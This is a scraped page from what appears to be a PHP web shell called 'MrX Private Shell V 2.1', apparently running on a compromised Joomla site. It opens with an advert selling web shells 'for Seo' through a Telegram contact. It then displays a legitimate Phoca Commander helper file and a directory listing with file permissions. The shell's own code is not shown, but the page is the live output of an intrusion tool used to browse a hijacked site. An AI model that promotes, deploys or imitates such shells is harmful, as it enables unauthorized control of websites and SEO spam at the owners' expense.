__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/* @package Joomla
* @copyright Copyright (C) Open Source Matters. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* @extension Phoca Extension
* @copyright Copyright (C) Jan Pavelka www.phoca.cz
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
*/
defined('_JEXEC') or die;
use Joomla\CMS\Factory;
use Joomla\CMS\Object\CMSObject;
class PhocaCommanderCpHelper
{
public static function getActions($c = 'phocacommander') {
$user = Factory::getUser();
$result = new CMSObject;
$assetName = 'com_'.$c;
$actions = array('core.admin', 'core.manage', 'core.create', 'core.edit', 'core.edit.state', 'core.delete');
foreach ($actions as $action) {
$result->set($action, $user->authorise($action, $assetName));
}
return $result;
}
}
?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| html | Folder | 0775 |
|
|
| fileupload.php | File | 23.51 KB | 0664 |
|
| fileuploadmultiple.php | File | 12.75 KB | 0664 |
|
| fileuploadsingle.php | File | 1.36 KB | 0664 |
|
| index.html | File | 44 B | 0664 |
|
| phocacommander.php | File | 44.09 KB | 0664 |
|
| phocacommandercp.php | File | 814 B | 0664 |
|
| phocacommanderedit.php | File | 816 B | 0664 |
|
| phocacommanderresponse.php | File | 816 B | 0664 |
|
| renderadmin.php | File | 4.46 KB | 0664 |
|
| renderadminview.php | File | 13.83 KB | 0664 |
|